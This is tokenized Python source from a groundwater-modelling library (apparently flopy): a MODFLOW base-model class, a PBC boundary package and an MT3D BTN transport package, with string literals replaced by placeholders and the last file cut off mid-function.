extra [ i ] ) ) <EOL> return s <EOL> def get_package ( self , name ) : <EOL> """<STR_LIT>""" <EOL> for pp in ( self . packagelist ) : <EOL> if ( pp . name [ <NUM_LIT:0> ] . upper ( ) == name . upper ( ) ) : <EOL> return pp <EOL> return None <EOL> def get_package_list ( self ) : <EOL> """<STR_LIT>""" <EOL> val = [ ] <EOL> for pp in ( self . packagelist ) : <EOL> val . append ( pp . name [ <NUM_LIT:0> ] . upper ( ) ) <EOL> return val <EOL> def set_version ( self , version ) : <EOL> self . version = version . lower ( ) <EOL> if self . version not in list ( self . version_types . keys ( ) ) : <EOL> err = '<STR_LIT>' . format ( <EOL> self . version ) + '<STR_LIT>' <EOL> for v in list ( self . version_types . keys ( ) ) : <EOL> err += '<STR_LIT>' . format ( v ) <EOL> raise Exception ( err ) <EOL> self . heading = '<STR_LIT>' . format ( <EOL> self . version_types [ self . version ] ) <EOL> return None <EOL> def change_model_ws ( self , new_pth = None , reset_external = False ) : <EOL> """<STR_LIT>""" <EOL> if new_pth is None : <EOL> new_pth = os . getcwd ( ) <EOL> if not os . path . exists ( new_pth ) : <EOL> try : <EOL> sys . stdout . write ( <EOL> '<STR_LIT>' . format ( new_pth ) ) <EOL> os . makedirs ( new_pth ) <EOL> except : <EOL> print ( <EOL> '<STR_LIT>' . format ( <EOL> new_pth , os . getcwd ( ) ) ) <EOL> new_pth = os . getcwd ( ) <EOL> self . _model_ws = new_pth <EOL> sys . stdout . write ( <EOL> '<STR_LIT>' . format ( new_pth ) ) <EOL> for pp in ( self . packagelist ) : <EOL> pp . fn_path = os . path . join ( self . model_ws , pp . file_name [ <NUM_LIT:0> ] ) <EOL> if hasattr ( self , "<STR_LIT>" ) and self . external_path is not None and not os . path . exists ( os . path . join ( self . _model_ws , <EOL> self . external_path ) ) : <EOL> pth = os . path . join ( self . _model_ws , self . external_path ) <EOL> os . makedirs ( pth ) <EOL> if reset_external : <EOL> self . _reset_external ( pth ) <EOL> elif reset_external : <EOL> self . _reset_external ( self . 
_model_ws ) <EOL> return None <EOL> def _reset_external ( self , pth ) : <EOL> new_ext_fnames = [ ] <EOL> for ext_file in self . external_fnames : <EOL> new_ext_file = os . path . join ( pth , os . path . split ( ext_file ) [ - <NUM_LIT:1> ] ) <EOL> new_ext_fnames . append ( new_ext_file ) <EOL> self . external_fnames = new_ext_fnames <EOL> @ property <EOL> def model_ws ( self ) : <EOL> return copy . deepcopy ( self . _model_ws ) <EOL> def _set_name ( self , value ) : <EOL> """<STR_LIT>""" <EOL> self . __name = str ( value ) <EOL> self . namefile = self . __name + '<STR_LIT:.>' + self . namefile_ext <EOL> for p in self . packagelist : <EOL> for i in range ( len ( p . extension ) ) : <EOL> p . file_name [ i ] = self . __name + '<STR_LIT:.>' + p . extension [ i ] <EOL> p . fn_path = os . path . join ( self . model_ws , p . file_name [ <NUM_LIT:0> ] ) <EOL> def __setattr__ ( self , key , value ) : <EOL> if key == "<STR_LIT:name>" : <EOL> self . _set_name ( value ) <EOL> elif key == "<STR_LIT>" : <EOL> self . change_model_ws ( value ) <EOL> elif key == "<STR_LIT>" : <EOL> assert isinstance ( value , utils . SpatialReference ) <EOL> self . _sr = value <EOL> else : <EOL> super ( BaseModel , self ) . __setattr__ ( key , value ) <EOL> def run_model ( self , silent = False , pause = False , report = False , <EOL> normal_msg = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> return run_model ( self . exe_name , self . namefile , model_ws = self . model_ws , <EOL> silent = silent , pause = pause , report = report , <EOL> normal_msg = normal_msg ) <EOL> def load_results ( self ) : <EOL> print ( '<STR_LIT>' ) <EOL> return None <EOL> def write_input ( self , SelPackList = False , check = False ) : <EOL> """<STR_LIT>""" <EOL> if check : <EOL> self . check ( f = '<STR_LIT>' . format ( self . name ) , verbose = self . verbose , <EOL> level = <NUM_LIT:1> ) <EOL> if self . verbose : <EOL> print ( '<STR_LIT>' ) <EOL> if SelPackList == False : <EOL> for p in self . 
packagelist : <EOL> if self . verbose : <EOL> print ( '<STR_LIT>' , p . name [ <NUM_LIT:0> ] ) <EOL> try : <EOL> p . write_file ( check = False ) <EOL> except TypeError : <EOL> p . write_file ( ) <EOL> else : <EOL> for pon in SelPackList : <EOL> for i , p in enumerate ( self . packagelist ) : <EOL> if pon in p . name : <EOL> if self . verbose : <EOL> print ( '<STR_LIT>' , p . name [ <NUM_LIT:0> ] ) <EOL> try : <EOL> p . write_file ( check = False ) <EOL> except TypeError : <EOL> p . write_file ( ) <EOL> break <EOL> if self . verbose : <EOL> print ( '<STR_LIT:U+0020>' ) <EOL> self . write_name_file ( ) <EOL> return <EOL> def write_name_file ( self ) : <EOL> """<STR_LIT>""" <EOL> raise Exception ( <EOL> '<STR_LIT>' ) <EOL> @ property <EOL> def name ( self ) : <EOL> """<STR_LIT>""" <EOL> return copy . deepcopy ( self . __name ) <EOL> def add_pop_key_list ( self , key ) : <EOL> """<STR_LIT>""" <EOL> if key not in self . pop_key_list : <EOL> self . pop_key_list . append ( key ) <EOL> def check ( self , f = None , verbose = True , level = <NUM_LIT:1> ) : <EOL> """<STR_LIT>""" <EOL> results = { } <EOL> for p in self . packagelist : <EOL> results [ p . name [ <NUM_LIT:0> ] ] = p . check ( f = None , verbose = False , <EOL> level = level - <NUM_LIT:1> ) <EOL> chk = utils . check ( self , f = f , verbose = verbose , level = level ) <EOL> if self . version in chk . solver_packages . keys ( ) : <EOL> solvers = set ( chk . solver_packages [ self . version ] ) . intersection ( <EOL> set ( self . get_package_list ( ) ) ) <EOL> if not solvers : <EOL> chk . _add_to_summary ( '<STR_LIT>' , desc = '<STR_LIT>' , <EOL> package = '<STR_LIT>' ) <EOL> elif len ( list ( solvers ) ) > <NUM_LIT:1> : <EOL> for s in solvers : <EOL> chk . _add_to_summary ( '<STR_LIT>' , <EOL> desc = '<STR_LIT>' , <EOL> package = s ) <EOL> else : <EOL> chk . passed . append ( '<STR_LIT>' ) <EOL> package_units = { } <EOL> duplicate_units = { } <EOL> for p in self . packagelist : <EOL> for i in range ( len ( p . 
name ) ) : <EOL> if p . unit_number [ i ] != <NUM_LIT:0> : <EOL> if p . unit_number [ i ] in package_units . values ( ) : <EOL> duplicate_units [ p . name [ i ] ] = p . unit_number [ i ] <EOL> otherpackage = [ k for k , v in package_units . items ( ) <EOL> if v == p . unit_number [ i ] ] [ <NUM_LIT:0> ] <EOL> duplicate_units [ otherpackage ] = p . unit_number [ i ] <EOL> if len ( duplicate_units ) > <NUM_LIT:0> : <EOL> for k , v in duplicate_units . items ( ) : <EOL> chk . _add_to_summary ( '<STR_LIT>' , package = k , value = v , <EOL> desc = '<STR_LIT>' ) <EOL> else : <EOL> chk . passed . append ( '<STR_LIT>' ) <EOL> for k , r in results . items ( ) : <EOL> if r is not None and r . summary_array is not None : <EOL> chk . summary_array = np . append ( chk . summary_array , <EOL> r . summary_array ) . view ( <EOL> np . recarray ) <EOL> chk . passed += [ '<STR_LIT>' . format ( r . package . name [ <NUM_LIT:0> ] , psd ) <EOL> for psd in r . passed ] <EOL> chk . summarize ( ) <EOL> return chk <EOL> def plot ( self , SelPackList = None , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> if '<STR_LIT>' in kwargs : <EOL> kper = int ( kwargs . pop ( '<STR_LIT>' ) ) <EOL> else : <EOL> kper = <NUM_LIT:0> <EOL> if '<STR_LIT>' in kwargs : <EOL> mflay = kwargs . pop ( '<STR_LIT>' ) <EOL> else : <EOL> mflay = None <EOL> if '<STR_LIT>' in kwargs : <EOL> fileb = kwargs . pop ( '<STR_LIT>' ) <EOL> else : <EOL> fileb = None <EOL> if '<STR_LIT>' in kwargs : <EOL> fext = kwargs . pop ( '<STR_LIT>' ) <EOL> fext = fext . replace ( '<STR_LIT:.>' , '<STR_LIT>' ) <EOL> else : <EOL> fext = '<STR_LIT>' <EOL> if '<STR_LIT:key>' in kwargs : <EOL> key = kwargs . pop ( '<STR_LIT:key>' ) <EOL> else : <EOL> key = None <EOL> if self . verbose : <EOL> print ( '<STR_LIT>' ) <EOL> axes = [ ] <EOL> ifig = <NUM_LIT:0> <EOL> if SelPackList is None : <EOL> for p in self . packagelist : <EOL> caxs = p . 
plot ( initial_fig = ifig , <EOL> filename_base = fileb , file_extension = fext , <EOL> kper = kper , mflay = mflay , key = key ) <EOL> if isinstance ( caxs , list ) : <EOL> for c in caxs : <EOL> axes . append ( c ) <EOL> else : <EOL> axes . append ( caxs ) <EOL> ifig = len ( axes ) + <NUM_LIT:1> <EOL> else : <EOL> for pon in SelPackList : <EOL> for i , p in enumerate ( self . packagelist ) : <EOL> if pon in p . name : <EOL> if self . verbose : <EOL> print ( '<STR_LIT>' , p . name [ <NUM_LIT:0> ] ) <EOL> caxs = p . plot ( initial_fig = ifig , <EOL> filename_base = fileb , file_extension = fext , <EOL> kper = kper , mflay = mflay , key = key ) <EOL> if isinstance ( caxs , list ) : <EOL> for c in caxs : <EOL> axes . append ( c ) <EOL> else : <EOL> axes . append ( caxs ) <EOL> ifig = len ( axes ) + <NUM_LIT:1> <EOL> break <EOL> if self . verbose : <EOL> print ( '<STR_LIT:U+0020>' ) <EOL> return axes <EOL> def to_shapefile ( self , filename , package_names = None , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> import warnings <EOL> warnings . warn ( "<STR_LIT>" ) <EOL> self . export ( filename , package_names = package_names ) <EOL> return <EOL> def run_model ( exe_name , namefile , model_ws = '<STR_LIT>' , <EOL> silent = False , pause = False , report = False , <EOL> normal_msg = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> success = False <EOL> buff = [ ] <EOL> exe = which ( exe_name ) <EOL> if exe is None : <EOL> import platform <EOL> if platform . system ( ) in '<STR_LIT>' : <EOL> if not exe_name . lower ( ) . endswith ( '<STR_LIT>' ) : <EOL> exe = which ( exe_name + '<STR_LIT>' ) <EOL> if exe is None : <EOL> s = '<STR_LIT>' . format ( <EOL> exe_name ) <EOL> raise Exception ( s ) <EOL> else : <EOL> if not silent : <EOL> s = '<STR_LIT>' . format ( <EOL> exe ) <EOL> print ( s ) <EOL> if not os . path . isfile ( os . path . join ( model_ws , namefile ) ) : <EOL> s = '<STR_LIT>' . format ( namefile ) <EOL> raise Exception ( s ) <EOL> proc = sp . 
Popen ( [ exe_name , namefile ] , <EOL> stdout = sp . PIPE , cwd = model_ws ) <EOL> while True : <EOL> line = proc . stdout . readline ( ) <EOL> c = line . decode ( '<STR_LIT:utf-8>' ) <EOL> if c != '<STR_LIT>' : <EOL> if normal_msg in c . lower ( ) : <EOL> success = True <EOL> c = c . rstrip ( '<STR_LIT:\r\n>' ) <EOL> if not silent : <EOL> print ( '<STR_LIT:{}>' . format ( c ) ) <EOL> if report == True : <EOL> buff . append ( c ) <EOL> else : <EOL> break <EOL> if pause : <EOL> input ( '<STR_LIT>' ) <EOL> return success , buff </s>
<s> import numpy as np <EOL> from . . pakbase import Package <EOL> class ModflowPbc ( Package ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , model , layer_row_column_data = None , <EOL> layer_row_column_shead_ehead = None , <EOL> cosines = None , extension = '<STR_LIT>' , unitnumber = <NUM_LIT:30> , zerobase = True ) : <EOL> Package . __init__ ( self , model , extension , '<STR_LIT>' , <EOL> unitnumber ) <EOL> self . heading = '<STR_LIT>' <EOL> self . mxactp = <NUM_LIT:0> <EOL> if layer_row_column_data is None : <EOL> if layer_row_column_shead_ehead is not None : <EOL> print ( '<STR_LIT>' + '<STR_LIT>' ) <EOL> layer_row_column_data = layer_row_column_shead_ehead <EOL> else : <EOL> raise Exception ( '<STR_LIT>' ) <EOL> self . mxactp , self . layer_row_column_data = self . assign_layer_row_column_data ( layer_row_column_data , <NUM_LIT:5> , <EOL> zerobase = zerobase ) <EOL> self . mxcos , self . cosines = self . assign_layer_row_column_data ( cosines , <NUM_LIT:3> , <EOL> zerobase = False ) <EOL> '''<STR_LIT>''' <EOL> self . np = <NUM_LIT:0> <EOL> self . parent . add_package ( self ) <EOL> def ncells ( self ) : <EOL> return self . mxactp <EOL> def write_file ( self ) : <EOL> """<STR_LIT>""" <EOL> f_pbc = open ( self . fn_path , '<STR_LIT:w>' ) <EOL> f_pbc . write ( '<STR_LIT>' % self . heading ) <EOL> f_pbc . write ( '<STR_LIT>' % ( self . mxactp , self . mxcos ) ) <EOL> for n in range ( self . parent . get_package ( '<STR_LIT>' ) . nper ) : <EOL> if ( n < len ( self . layer_row_column_data ) ) : <EOL> a = self . layer_row_column_data [ n ] <EOL> itmp = a . shape [ <NUM_LIT:0> ] <EOL> else : <EOL> itmp = - <NUM_LIT:1> <EOL> if ( n < len ( self . cosines ) ) : <EOL> c = self . cosines [ n ] <EOL> ctmp = c . shape [ <NUM_LIT:0> ] <EOL> else : <EOL> ctmp = - <NUM_LIT:1> <EOL> f_pbc . write ( '<STR_LIT>' % ( itmp , ctmp , self . np ) ) <EOL> if ( n < len ( self . layer_row_column_data ) ) : <EOL> for b in a : <EOL> f_pbc . 
write ( '<STR_LIT>' % ( b [ <NUM_LIT:0> ] , b [ <NUM_LIT:1> ] , b [ <NUM_LIT:2> ] , b [ <NUM_LIT:3> ] , b [ <NUM_LIT:4> ] ) ) <EOL> if ( n < len ( self . cosines ) ) : <EOL> for d in c : <EOL> f_pbc . write ( '<STR_LIT>' % ( d [ <NUM_LIT:0> ] , d [ <NUM_LIT:1> ] , d [ <NUM_LIT:2> ] ) ) <EOL> f_pbc . close ( ) </s>
<s> """<STR_LIT>""" <EOL> import numpy as np <EOL> from . . pakbase import Package <EOL> from . . utils import Util2d , Util3d , read1d <EOL> import warnings <EOL> class Mt3dBtn ( Package ) : <EOL> """<STR_LIT>""" <EOL> unitnumber = <NUM_LIT> <EOL> def __init__ ( self , model , nlay = None , nrow = None , ncol = None , nper = None , <EOL> ncomp = <NUM_LIT:1> , mcomp = <NUM_LIT:1> , tunit = '<STR_LIT:D>' , lunit = '<STR_LIT:M>' , munit = '<STR_LIT>' , <EOL> laycon = None , delr = None , delc = None , htop = None , dz = None , <EOL> prsity = <NUM_LIT> , icbund = <NUM_LIT:1> , <EOL> sconc = <NUM_LIT:0.0> , cinact = <NUM_LIT> , thkmin = <NUM_LIT> , ifmtcn = <NUM_LIT:0> , ifmtnp = <NUM_LIT:0> , <EOL> ifmtrf = <NUM_LIT:0> , ifmtdp = <NUM_LIT:0> , savucn = True , nprs = <NUM_LIT:0> , timprs = None , <EOL> obs = None , nprobs = <NUM_LIT:1> , chkmas = True , nprmas = <NUM_LIT:1> , <EOL> perlen = None , nstp = None , tsmult = None , ssflag = None , dt0 = <NUM_LIT:0> , <EOL> mxstrn = <NUM_LIT> , ttsmult = <NUM_LIT:1.0> , ttsmax = <NUM_LIT:0> , <EOL> species_names = None , extension = '<STR_LIT>' , ** kwargs ) : <EOL> Package . __init__ ( self , model , extension , '<STR_LIT>' , self . unitnumber ) <EOL> self . setmodflowvars ( nlay , nrow , ncol , nper , laycon , delr , delc , htop , <EOL> dz , perlen , nstp , tsmult ) <EOL> self . heading1 = '<STR_LIT>' <EOL> self . heading2 = '<STR_LIT:#>' <EOL> self . ncomp = ncomp <EOL> self . mcomp = mcomp <EOL> self . tunit = tunit <EOL> self . lunit = lunit <EOL> self . munit = munit <EOL> self . cinact = cinact <EOL> self . thkmin = thkmin <EOL> self . ifmtcn = ifmtcn <EOL> self . ifmtnp = ifmtnp <EOL> self . ifmtrf = ifmtrf <EOL> self . ifmtdp = ifmtdp <EOL> self . savucn = savucn <EOL> self . nprs = nprs <EOL> self . timprs = timprs <EOL> self . obs = obs <EOL> self . nprobs = nprobs <EOL> self . chkmas = chkmas <EOL> self . nprmas = nprmas <EOL> if species_names is None : <EOL> species_names = [ ] <EOL> self . 
species_names = species_names <EOL> self . prsity = Util3d ( model , ( self . nlay , self . nrow , self . ncol ) , <EOL> np . float32 , prsity , name = '<STR_LIT>' , <EOL> locat = self . unit_number [ <NUM_LIT:0> ] ) <EOL> self . icbund = Util3d ( model , ( self . nlay , self . nrow , self . ncol ) , np . int , <EOL> icbund , name = '<STR_LIT>' , <EOL> locat = self . unit_number [ <NUM_LIT:0> ] ) <EOL> self . ssflag = ssflag <EOL> self . dt0 = Util2d ( model , ( self . nper , ) , np . float32 , dt0 , name = '<STR_LIT>' ) <EOL> self . mxstrn = Util2d ( model , ( self . nper , ) , np . int , mxstrn , <EOL> name = '<STR_LIT>' ) <EOL> self . ttsmult = Util2d ( model , ( self . nper , ) , np . float32 , ttsmult , <EOL> name = '<STR_LIT>' ) <EOL> self . ttsmax = Util2d ( model , ( self . nper , ) , np . float32 , ttsmax , <EOL> name = '<STR_LIT>' ) <EOL> self . sconc = [ ] <EOL> u3d = Util3d ( model , ( self . nlay , self . nrow , self . ncol ) , np . float32 , <EOL> sconc , name = '<STR_LIT>' , locat = self . unit_number [ <NUM_LIT:0> ] ) <EOL> self . sconc . append ( u3d ) <EOL> if ncomp > <NUM_LIT:1> : <EOL> for icomp in range ( <NUM_LIT:2> , ncomp + <NUM_LIT:1> ) : <EOL> name = "<STR_LIT>" + str ( icomp ) <EOL> val = <NUM_LIT:0.0> <EOL> if name in kwargs : <EOL> val = kwargs . pop ( name ) <EOL> else : <EOL> print ( "<STR_LIT>" + <EOL> str ( icomp ) + "<STR_LIT>" + <EOL> name ) <EOL> u3d = Util3d ( model , ( self . nlay , self . nrow , self . ncol ) , <EOL> np . float32 , val , name = name , <EOL> locat = self . unit_number [ <NUM_LIT:0> ] ) <EOL> self . sconc . append ( u3d ) <EOL> if len ( list ( kwargs . keys ( ) ) ) > <NUM_LIT:0> : <EOL> raise Exception ( "<STR_LIT>" + <EOL> '<STR_LIT:U+0020>' . join ( list ( kwargs . keys ( ) ) ) ) <EOL> self . parent . 
add_package ( self ) <EOL> return <EOL> def setmodflowvars ( self , nlay , nrow , ncol , nper , laycon , delr , delc , htop , <EOL> dz , perlen , nstp , tsmult ) : <EOL> '''<STR_LIT>''' <EOL> validmfdis = True <EOL> try : <EOL> dum = self . parent . mf . dis . nlay <EOL> except : <EOL> validmfdis = False <EOL> mfvarlist = [ nlay , nrow , ncol , nper , laycon , delr , delc , htop , dz , <EOL> perlen , nstp , tsmult ] <EOL> if not validmfdis : <EOL> for v in mfvarlist : <EOL> s = '<STR_LIT>' <EOL> s += '<STR_LIT>' <EOL> s += '<STR_LIT>' <EOL> s += '<STR_LIT>' <EOL> s += '<STR_LIT>' <EOL> if v is None : <EOL> raise Exception ( s ) <EOL> if nlay is not None : <EOL> self . nlay = nlay <EOL> else : <EOL> self . nlay = self . parent . mf . dis . nlay <EOL> if nrow is not None : <EOL> self . nrow = nrow <EOL> else : <EOL> self . nrow = self . parent . mf . dis . nrow <EOL> if ncol is not None : <EOL> self . ncol = ncol <EOL> else : <EOL> self . ncol = self . parent . mf . dis . ncol <EOL> if nper is not None : <EOL> self . nper = nper <EOL> else : <EOL> self . nper = self . parent . mf . dis . nper <EOL> nlay = self . nlay <EOL> nrow = self . nrow <EOL> ncol = self . ncol <EOL> nper = self . nper <EOL> if delr is not None : <EOL> self . delr = Util2d ( self . parent , ( ncol , ) , np . float32 , delr , <EOL> name = '<STR_LIT>' , <EOL> locat = self . unit_number [ <NUM_LIT:0> ] ) <EOL> else : <EOL> self . delr = Util2d ( self . parent , ( ncol , ) , np . float32 , <EOL> self . parent . mf . dis . delr . get_value ( ) , <EOL> name = '<STR_LIT>' , <EOL> locat = self . unit_number [ <NUM_LIT:0> ] ) <EOL> if delc is not None : <EOL> self . delc = Util2d ( self . parent , ( nrow , ) , np . float32 , delc , <EOL> name = '<STR_LIT>' , <EOL> locat = self . unit_number [ <NUM_LIT:0> ] ) <EOL> else : <EOL> self . delc = Util2d ( self . parent , ( nrow , ) , np . float32 , <EOL> self . parent . mf . dis . delc . get_value ( ) , <EOL> name = '<STR_LIT>' , <EOL> locat = self . 
unit_number [ <NUM_LIT:0> ] ) <EOL> if htop is not None : <EOL> self . htop = Util2d ( self . parent , ( nrow , ncol ) , np . float32 , htop , <EOL> name = '<STR_LIT>' , <EOL> locat = self . unit_number [ <NUM_LIT:0> ] ) <EOL> else : <EOL> self . htop = Util2d ( self . parent , ( nrow , ncol ) , np . float32 , <EOL> self . parent . mf . dis . top . get_value ( ) , <EOL> name = '<STR_LIT>' , <EOL> locat = self . unit_number [ <NUM_LIT:0> ] ) <EOL> if dz is not None : <EOL> self . dz = Util3d ( self . parent , ( nlay , nrow , ncol ) , np . float32 , dz , <EOL> name = '<STR_LIT>' , <EOL> locat = self . unit_number [ <NUM_LIT:0> ] ) <EOL> else : <EOL> thickness = self . parent . mf . dis . thickness . get_value ( ) <EOL> self . dz = Util3d ( self . parent , ( nlay , nrow , ncol ) , np . float32 , <EOL> thickness , name = '<STR_LIT>' , <EOL> locat = self . unit_number [ <NUM_LIT:0> ] ) <EOL> if perlen is not None : <EOL> self . perlen = Util2d ( self . parent , ( nper , ) , np . float32 , perlen , <EOL> name = '<STR_LIT>' , <EOL> locat = self . unit_number [ <NUM_LIT:0> ] ) <EOL> else : <EOL> self . perlen = Util2d ( self . parent , ( nper , ) , np . float32 , <EOL> self . parent . mf . dis . perlen . get_value ( ) , <EOL> name = '<STR_LIT>' , <EOL> locat = self . unit_number [ <NUM_LIT:0> ] ) <EOL> if nstp is not None : <EOL> self . nstp = Util2d ( self . parent , ( nper , ) , np . int , nstp , <EOL> name = '<STR_LIT>' , <EOL> locat = self . unit_number [ <NUM_LIT:0> ] ) <EOL> else : <EOL> self . nstp = Util2d ( self . parent , ( nper , ) , np . int , <EOL> self . parent . mf . dis . nstp . get_value ( ) , <EOL> name = '<STR_LIT>' , <EOL> locat = self . unit_number [ <NUM_LIT:0> ] ) <EOL> if tsmult is not None : <EOL> self . tsmult = Util2d ( self . parent , ( nper , ) , np . float32 , tsmult , <EOL> name = '<STR_LIT>' , <EOL> locat = self . unit_number [ <NUM_LIT:0> ] ) <EOL> else : <EOL> self . tsmult = Util2d ( self . parent , ( nper , ) , np . 
float32 , <EOL> self . parent . mf . dis . tsmult . get_value ( ) , <EOL> name = '<STR_LIT>' , <EOL> locat = self . unit_number [ <NUM_LIT:0> ] ) <EOL> self . laycon = None <EOL> if laycon is not None : <EOL> self . laycon = Util2d ( self . parent , ( nlay , ) , np . int , laycon , <EOL> name = '<STR_LIT>' , <EOL> locat = self . unit_number [ <NUM_LIT:0> ] ) <EOL> else : <EOL> flow_package = self . parent . mf . get_package ( '<STR_LIT>' ) <EOL> if flow_package is not None : <EOL> self . laycon = Util2d ( self . parent , ( nlay , ) , np . int , <EOL> flow_package . laycon . get_value ( ) , <EOL> name = '<STR_LIT>' , <EOL> locat = self . unit_number [ <NUM_LIT:0> ] ) <EOL> else : <EOL> flow_package = self . parent . mf . get_package ( '<STR_LIT>' ) <EOL> if flow_package is not None : <EOL> self . laycon = Util2d ( self . parent , ( nlay , ) , <EOL> np . int , flow_package . laytyp . get_value ( ) , <EOL> name = '<STR_LIT>' , locat = self . unit_number [ <NUM_LIT:0> ] ) <EOL> s = '<STR_LIT>' <EOL> s += '<STR_LIT>' <EOL> s += '<STR_LIT>' <EOL> if self . laycon is None : <EOL> warnings . warn ( s ) <EOL> self . laycon = Util2d ( self . parent , ( nlay , ) , np . int , <NUM_LIT:1> , <EOL> name = '<STR_LIT>' , <EOL> locat = self . unit_number [ <NUM_LIT:0> ] ) <EOL> return <EOL> def write_file ( self ) : <EOL> """<STR_LIT>""" <EOL> f_btn = open ( self . fn_path , '<STR_LIT:w>' ) <EOL> f_btn . write ( '<STR_LIT>' . format ( self . heading1 , self . heading2 ) ) <EOL> f_btn . write ( '<STR_LIT>' <EOL> . format ( self . nlay , self . nrow , self . ncol , self . nper , <EOL> self . ncomp , self . mcomp ) ) <EOL> f_btn . write ( '<STR_LIT>' . format ( self . tunit , self . lunit , self . munit ) ) <EOL> if ( self . parent . adv != None ) : <EOL> f_btn . write ( '<STR_LIT>' . format ( '<STR_LIT:T>' ) ) <EOL> else : <EOL> f_btn . write ( '<STR_LIT>' . format ( '<STR_LIT:F>' ) ) <EOL> if ( self . parent . dsp != None ) : <EOL> f_btn . write ( '<STR_LIT>' . 
format ( '<STR_LIT:T>' ) ) <EOL> else : <EOL> f_btn . write ( '<STR_LIT>' . format ( '<STR_LIT:F>' ) ) <EOL> if ( self . parent . ssm != None ) : <EOL> f_btn . write ( '<STR_LIT>' . format ( '<STR_LIT:T>' ) ) <EOL> else : <EOL> f_btn . write ( '<STR_LIT>' . format ( '<STR_LIT:F>' ) ) <EOL> if ( self . parent . rct != None ) : <EOL> f_btn . write ( '<STR_LIT>' . format ( '<STR_LIT:T>' ) ) <EOL> else : <EOL> f_btn . write ( '<STR_LIT>' . format ( '<STR_LIT:F>' ) ) <EOL> if ( self . parent . gcg != None ) : <EOL> f_btn . write ( '<STR_LIT>' . format ( '<STR_LIT:T>' ) ) <EOL> else : <EOL> f_btn . write ( '<STR_LIT>' . format ( '<STR_LIT:F>' ) ) <EOL> f_btn . write ( '<STR_LIT:\n>' ) <EOL> self . laycon . set_fmtin ( '<STR_LIT>' ) <EOL> f_btn . write ( self . laycon . string ) <EOL> f_btn . write ( self . delr . get_file_entry ( ) ) <EOL> f_btn . write ( self . delc . get_file_entry ( ) ) <EOL> f_btn . write ( self . htop . get_file_entry ( ) ) <EOL> f_btn . write ( self . dz . get_file_entry ( ) ) <EOL> f_btn . write ( self . prsity . get_file_entry ( ) ) <EOL> f_btn . write ( self . icbund . get_file_entry ( ) ) <EOL> for s in range ( len ( self . sconc ) ) : <EOL> f_btn . write ( self . sconc [ s ] . get_file_entry ( ) ) <EOL> f_btn . write ( '<STR_LIT>' . format ( self . cinact , self . thkmin ) ) <EOL> f_btn . write ( '<STR_LIT>' . format ( self . ifmtcn , self . ifmtnp , self . ifmtrf , self . ifmtdp ) ) <EOL> if ( self . savucn == True ) : <EOL> ss = '<STR_LIT:T>' <EOL> else : <EOL> ss = '<STR_LIT:F>' <EOL> f_btn . write ( '<STR_LIT>' . format ( ss ) ) <EOL> if self . timprs is None : <EOL> f_btn . write ( '<STR_LIT>' . format ( self . nprs ) ) <EOL> else : <EOL> f_btn . write ( '<STR_LIT>' . format ( len ( self . timprs ) ) ) <EOL> timprs = Util2d ( self . parent , ( len ( self . timprs ) , ) , <EOL> np . float32 , self . timprs , name = '<STR_LIT>' , <EOL> fmtin = '<STR_LIT>' ) <EOL> timprs . format . fortran = '<STR_LIT>' <EOL> f_btn . write ( timprs . 
string ) <EOL> if self . obs is None : <EOL> f_btn . write ( '<STR_LIT>' . format ( <NUM_LIT:0> , self . nprobs ) ) <EOL> else : <EOL> nobs = self . obs . shape [ <NUM_LIT:0> ] <EOL> f_btn . write ( '<STR_LIT>' . format ( nobs , self . nprobs ) ) <EOL> for r in range ( nobs ) : <EOL> f_btn . write ( '<STR_LIT>' . format ( self . obs [ r , <NUM_LIT:0> ] , self . obs [ r , <NUM_LIT:1> ] , <EOL> self . obs [ r , <NUM_LIT:2> ] ) ) <EOL> if ( self . chkmas == True ) : <EOL> ss = '<STR_LIT:T>' <EOL> else : <EOL> ss = '<STR_LIT:F>' <EOL> f_btn . write ( '<STR_LIT>' . format ( ss , self . nprmas ) ) <EOL> for t in range ( self . nper ) : <EOL> s = '<STR_LIT>' . format ( self . perlen [ t ] , <EOL> self . nstp [ t ] , <EOL> self . tsmult [ t ] ) <EOL> if self . ssflag is not None : <EOL> s += '<STR_LIT:U+0020>' + self . ssflag [ t ] <EOL> s += '<STR_LIT:\n>' <EOL> f_btn . write ( s ) <EOL> f_btn . write ( '<STR_LIT>' <EOL> . format ( self . dt0 [ t ] , self . mxstrn [ t ] , <EOL> self . ttsmult [ t ] , self . ttsmax [ t ] ) ) <EOL> f_btn . close ( ) <EOL> return <EOL> @ staticmethod <EOL> def load ( f , model , ext_unit_dict = None ) : <EOL> if not hasattr ( f , '<STR_LIT>' ) : <EOL> filename = f <EOL> f = open ( filename , '<STR_LIT:r>' ) <EOL> if model . verbose : <EOL> print ( '<STR_LIT>' ) <EOL> line = f . readline ( ) <EOL> if model . verbose : <EOL> print ( '<STR_LIT>' . format ( line . strip ( ) ) ) <EOL> line = f . readline ( ) <EOL> if model . verbose : <EOL> print ( '<STR_LIT>' . format ( line . strip ( ) ) ) <EOL> if model . verbose : <EOL> print ( '<STR_LIT>' ) <EOL> line = f . 
readline ( ) <EOL> nlay = int ( line [ <NUM_LIT:0> : <NUM_LIT:10> ] ) <EOL> nrow = int ( line [ <NUM_LIT:11> : <NUM_LIT:20> ] ) <EOL> ncol = int ( line [ <NUM_LIT> : <NUM_LIT:30> ] ) <EOL> nper = int ( line [ <NUM_LIT> : <NUM_LIT> ] ) <EOL> try : <EOL> ncomp = int ( line [ <NUM_LIT> : <NUM_LIT:50> ] ) <EOL> except : <EOL> ncomp = <NUM_LIT:1> <EOL> try : <EOL> mcomp = int ( line [ <NUM_LIT> : <NUM_LIT> ] ) <EOL> except : <EOL> mcomp = <NUM_LIT:1> <EOL> if model . verbose : <EOL> print ( '<STR_LIT>' . format ( nlay ) ) <EOL> print ( '<STR_LIT>' . format ( nrow ) ) <EOL> print ( '<STR_LIT>' . format ( ncol ) ) <EOL> print ( '<STR_LIT>' . format ( nper ) ) <EOL> print ( '<STR_LIT>' . format ( ncomp ) ) <EOL> print ( '<STR_LIT>' . format ( mcomp ) ) <EOL> if model . verbose : <EOL> print ( '<STR_LIT>' ) <EOL> line = f . readline ( ) <EOL> tunit = line [ <NUM_LIT:0> : <NUM_LIT:4> ] <EOL> lunit = line [ <NUM_LIT:4> : <NUM_LIT:8> ] <EOL> munit = line [ <NUM_LIT:8> : <NUM_LIT:12> ] <EOL> if model . verbose : <EOL> print ( '<STR_LIT>' . format ( 